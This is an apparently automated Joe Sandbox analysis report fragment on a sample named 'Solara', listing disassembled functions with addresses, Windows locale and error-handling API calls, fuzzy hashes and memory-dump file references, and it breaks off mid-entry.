Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 5b187597597e4ab1b8cd84d409bdf2efa9848249bf0d073d454220dd7a8a339e
Instruction ID: 9e0f1c293534c3123cd9e82487004193358b9ec3683739ff06089df24192694f
Opcode Fuzzy Hash: 5b187597597e4ab1b8cd84d409bdf2efa9848249bf0d073d454220dd7a8a339e
Instruction Fuzzy Hash: AEC1BC74A0464A8FCB35CF68E4E06BEBBA1AB45310F14463DD4A69B3A1C720AE47DB51

Function 00C6F928 Relevance: 1.6, Strings: 1, Instructions: 344COMMONLIBRARYCODE

Download Yara Rule

Strings

0, xrefs: 00C6FAB6

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 3ab18210d721d0bc49c6333717d8c31d1060187ef950c289d7199f52380f498b
Instruction ID: 0963693a40bb69e38787c7a7344c90c6e39adbef55d16bed3449c5be8c955f41
Opcode Fuzzy Hash: 3ab18210d721d0bc49c6333717d8c31d1060187ef950c289d7199f52380f498b
Instruction Fuzzy Hash: 7EC1CF7090064A9FCB34CE68E4D177EB7B1AF49314F24462DD8A697292C730AA47DB51

Function 00C9A011 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00C8E086: GetLastError.KERNEL32(?,00000008,00C92A5C), ref: 00C8E08A
Part of subcall function 00C8E086: SetLastError.KERNEL32(00000000,00CB9148,00000024,00C7BBF2), ref: 00C8E12C

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00C9A065

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 8a9132ef3ddf6580c5a91fe4a99756e489f0b26c22eecab623b5bdf6de579671
Instruction ID: ce6b412a772547b220461165b7b2903e269b5d39354b625997eaad917a94f713
Opcode Fuzzy Hash: 8a9132ef3ddf6580c5a91fe4a99756e489f0b26c22eecab623b5bdf6de579671
Instruction Fuzzy Hash: B221B332A14216ABDF28AB29DC49A7B33B8EF45314F10507AF912D7141EB74EE009B91

Function 00CFE830 Relevance: 1.6, Strings: 1, Instructions: 332COMMON

Download Yara Rule

Strings

P, xrefs: 00CFE9CC

Memory Dump Source

Source File: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID:
String ID: P
API String ID: 0-3110715001
Opcode ID: 4607b5e414deb918e6acdf193ca90152a062ab25d125737ca6b3dfc515f7391b
Instruction ID: 9f6a7eedf86d05c37e5b44b91043033c5c8df4b89e8182ad86c0ae5d5aeb3944
Opcode Fuzzy Hash: 4607b5e414deb918e6acdf193ca90152a062ab25d125737ca6b3dfc515f7391b
Instruction Fuzzy Hash: 31B1F3326083694BC325CE18885037FB6E2EBC5324F15862CEAB6AB3E1C771DD4597C6

Function 00C7001B Relevance: 1.6, Strings: 1, Instructions: 326COMMON

Download Yara Rule

Strings

0, xrefs: 00C701C2

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 6af40fefcdbaada2203ffb018a0a01ed53b44f8a2da00dc0770b5fe947c0d510
Instruction ID: 382bf307cbec1e17e37cb74ca78565e6a9519bbb8abc180d4bce5d9cd3847ecf
Opcode Fuzzy Hash: 6af40fefcdbaada2203ffb018a0a01ed53b44f8a2da00dc0770b5fe947c0d510
Instruction Fuzzy Hash: 1DB1BF70A0060ACFCB24DFA9C991BBEB7B1BF44314F70C51DD4AAA7291D630AE46DB51

Function 00C7038F Relevance: 1.6, Strings: 1, Instructions: 322COMMON

Download Yara Rule

Strings

0, xrefs: 00C70527

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: fcc3e69431a2d79123a6752cf0b25a3d8f1e5d07fd9e9cacba78269de18e606e
Instruction ID: fafa6d8eb8a1322d385d5dd949ab21a683412481776a40c122b4ec35ee1e442b
Opcode Fuzzy Hash: fcc3e69431a2d79123a6752cf0b25a3d8f1e5d07fd9e9cacba78269de18e606e
Instruction Fuzzy Hash: 0BB1AE70A0060ACFCB24CF69C590ABEB7B5BF84304F64C61DE56AA7290D730EE46DB51

Function 00C6FCB6 Relevance: 1.6, Strings: 1, Instructions: 322COMMON

Download Yara Rule

Strings

0, xrefs: 00C6FE4E

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 04b91ccaa4d9ff9fcab38cdb61bd43310e4939cc32e13199bd88ad32a9a701c0
Instruction ID: e1ab2ad3ace2d2b298d45c0e1e68f06bc7f13a74418ab18f8ebd9255c0c8ef50
Opcode Fuzzy Hash: 04b91ccaa4d9ff9fcab38cdb61bd43310e4939cc32e13199bd88ad32a9a701c0
Instruction Fuzzy Hash: 5AB1BF30A0060A8BCB34CFA8E5D0ABEB7F1BF45314F24892DD466A7691D731AE47DB51

Function 00C6EB5E Relevance: 1.6, Strings: 1, Instructions: 318COMMON

Download Yara Rule

Strings

0, xrefs: 00C6ECF7

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 197124242a6b82eeaa5ece0ed2bf2c280c9aad2d64152310b3bb480554a956d1
Instruction ID: 6f39da37e81fda5ffbac654a71e46200b23bcd291756b53f14f1a35cfab6e2c3
Opcode Fuzzy Hash: 197124242a6b82eeaa5ece0ed2bf2c280c9aad2d64152310b3bb480554a956d1
Instruction Fuzzy Hash: 58B1127890060A9BCF34DF68C5D5ABEB7B1AF41300F14061FE4A6E7291DB31AE02DB45

Function 00C6E816 Relevance: 1.6, Strings: 1, Instructions: 314COMMON

Download Yara Rule

Strings

0, xrefs: 00C6E9A0

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 32d77323216dd3cda7b123986524a51751e0b17bcf9b2aaec0cdfcff601d6acc
Instruction ID: 12b0b26d7979de06243df69c0d6d46e3467cc664b1f4191fbb5976504f5e3edd
Opcode Fuzzy Hash: 32d77323216dd3cda7b123986524a51751e0b17bcf9b2aaec0cdfcff601d6acc
Instruction Fuzzy Hash: 8CB1C27890060A8BCF38CF69C9D16BEBBB1AF45300F14461BD4A6E7292D731AE42DB51

Function 00C99C98 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00C8E086: GetLastError.KERNEL32(?,00000008,00C92A5C), ref: 00C8E08A
Part of subcall function 00C8E086: SetLastError.KERNEL32(00000000,00CB9148,00000024,00C7BBF2), ref: 00C8E12C

EnumSystemLocalesW.KERNEL32(00C99DBE,00000001,00000000,?,-00000050,?,00C9A3EF,00000000,?,?,?,00000055,?), ref: 00C99D0A

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 5af840c1f96927ef455195111ed0c26e64bc8b793559bc299c4241b470618360
Instruction ID: ef8b8bd49b86efca372d659aaae47d02ab448252d3efb5ca8e2c3653abb510e9
Opcode Fuzzy Hash: 5af840c1f96927ef455195111ed0c26e64bc8b793559bc299c4241b470618360
Instruction Fuzzy Hash: 4C11253B2003019FDF28AF3CD8D56BAB791FF80358B14842CE99687A40E371B942D780

Function 00C9A240 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 00C8E086: GetLastError.KERNEL32(?,00000008,00C92A5C), ref: 00C8E08A
Part of subcall function 00C8E086: SetLastError.KERNEL32(00000000,00CB9148,00000024,00C7BBF2), ref: 00C8E12C

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00C99FDA,00000000,00000000,?), ref: 00C9A26C

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 7d4e77cb6da4409c2b284a0dc1206aef86506ef798e5028980c4b4a386369058
Instruction ID: 0e33a6b7fd9c262c1811bca249709d164412a346fb8da288cab3176ac7f24105
Opcode Fuzzy Hash: 7d4e77cb6da4409c2b284a0dc1206aef86506ef798e5028980c4b4a386369058
Instruction Fuzzy Hash: 88F02D36A005227BDF285725CC0D7BA7768DF80354F164428ED1AA31C0EA71FF01C6D1

Function 00C99D33 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00C8E086: GetLastError.KERNEL32(?,00000008,00C92A5C), ref: 00C8E08A
Part of subcall function 00C8E086: SetLastError.KERNEL32(00000000,00CB9148,00000024,00C7BBF2), ref: 00C8E12C

EnumSystemLocalesW.KERNEL32(00C9A011,00000001,?,?,-00000050,?,00C9A3B3,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00C99D7D

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: a325844995636cc7beeb9df8193c511fe48b56e877052ef641df74accb4f19ae
Instruction ID: b0b7689381f4efd874117c70eca938eb18e5bcb6ceafe88fb7db92a4d7ba34cc
Opcode Fuzzy Hash: a325844995636cc7beeb9df8193c511fe48b56e877052ef641df74accb4f19ae
Instruction Fuzzy Hash: FBF0C2362003045FDB246F399CC5A7A7B91EF81768B05842DF9564B680D6B1AE41D650

Function 00C4E558 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoEx.KERNEL32(?,00000022,00000000,00000002,?,?,00C4BFDA,00000000,?,00000004,00C4A9C7,?,00000004,00C4AFCE,00000000,00000000), ref: 00C4E575

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: e1ce6fdf5a5197991f7e14e3f968dc9f63d33adb64467d940957b8be1d152488
Instruction ID: f33e5d7a4478190d0f244df1d5309af2756c9618adb0d2f8661c8b8a5042f662
Opcode Fuzzy Hash: e1ce6fdf5a5197991f7e14e3f968dc9f63d33adb64467d940957b8be1d152488
Instruction Fuzzy Hash: C3E09232760200E6E7298B799D0FFEB3AACFB0974EF018540B112DA0D1FAA0CF009261

Function 00C8B2A2 Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00C77A41: EnterCriticalSection.KERNEL32(-00D11690,?,00C85404,00000000,00CB8BE8,0000000C,00C853CB,?,?,00C8B225,?,?,00C8E224,00000001,00000364,00000000), ref: 00C77A50

EnumSystemLocalesW.KERNEL32(00C8B28F,00000001,00CB8EE8,0000000C,00C8BBCF,00000000), ref: 00C8B2DA

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 0b787e86d2b218ad4e97cae8f90e32a207a056764a274b9d788bc845f7835fa7
Instruction ID: 4cd11bba59b47bcc2ff311cb236e73e6675abfdae8dca4f19a31a3d8f33c8784
Opcode Fuzzy Hash: 0b787e86d2b218ad4e97cae8f90e32a207a056764a274b9d788bc845f7835fa7
Instruction Fuzzy Hash: 7DF04976A04314EFD700EF98E842BAD77F0FB09725F10852AF811DB2A0DB795A01EB54

Function 00C99C2F Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00C8E086: GetLastError.KERNEL32(?,00000008,00C92A5C), ref: 00C8E08A
Part of subcall function 00C8E086: SetLastError.KERNEL32(00000000,00CB9148,00000024,00C7BBF2), ref: 00C8E12C

EnumSystemLocalesW.KERNEL32(00C99B88,00000001,?,?,?,00C9A411,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00C99C66

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 33e9e2f89293ff1d8dafe8bbe617b077d1f67d20d15663a81e42a2ccfe05334f
Instruction ID: a1f2861274d7b61536f7904fabfef124e475db49ad253a4abf6ae3ee1b78bcfb
Opcode Fuzzy Hash: 33e9e2f89293ff1d8dafe8bbe617b077d1f67d20d15663a81e42a2ccfe05334f
Instruction Fuzzy Hash: 61F0E53A30020557CF14AF3AED4976A7F94EFC2764B06405CEA1A8B290D6759D42D790

Function 00C8BD5E Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00C88C58,?,20001004,00000000,00000002,?,?,00C87FD0), ref: 00C8BD92

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 89fe0945b99c3fd03c73f6cdad65584f0d97205b6c08f0a666645f39828a5d92
Instruction ID: 48f4fee5e79704dbc1fa11c8d12626a11fbdd6d8dda62e5b3f4924c88d6124e8
Opcode Fuzzy Hash: 89fe0945b99c3fd03c73f6cdad65584f0d97205b6c08f0a666645f39828a5d92
Instruction Fuzzy Hash: D2E04F31500228BBCF123F61DC05BEF7F29EF44755F004411FE0566121CB328D21AB98

Function 00C8B433 Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

EnumSystemLocalesW.KERNEL32(Function_0006B28F,00000001), ref: 00C8B44D

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 9cfe7c45d3dc52f2ddc870a2b8d198a065db6f755998f0c3e739dd8fa94238af
Instruction ID: dca6ea8329d8542de6a8a198461a0891e75b425c4d727e969ef0c8420ba7bd28
Opcode Fuzzy Hash: 9cfe7c45d3dc52f2ddc870a2b8d198a065db6f755998f0c3e739dd8fa94238af
Instruction Fuzzy Hash: 8CD09232548308BBDB046F51EC4AB693B76F785754B004129F809573B0EFBA6D51DA98

Function 00CF9FB0 Relevance: 1.5, Strings: 1, Instructions: 221COMMON

Download Yara Rule

Strings

KJML, xrefs: 00CF9FE5

Memory Dump Source

Source File: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID:
String ID: KJML
API String ID: 0-719402181
Opcode ID: 814909b5e4f899ae97c671dfffb326c9d41a53ad847473ded61e5763b1d7321a
Instruction ID: b2b1e5b5708da088b799016037d2efde456d71d85d844dd997fd06e9544c4cf2
Opcode Fuzzy Hash: 814909b5e4f899ae97c671dfffb326c9d41a53ad847473ded61e5763b1d7321a
Instruction Fuzzy Hash: EF617B72A043049BC7508F28D98067BF7A6EBC2324F1AD52DE9BDA7262D771DC018787

Function 00C222DB Relevance: 1.4, Strings: 1, Instructions: 156COMMON

Download Yara Rule

Strings

Z81xbyuAua, xrefs: 00C223FD

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID:
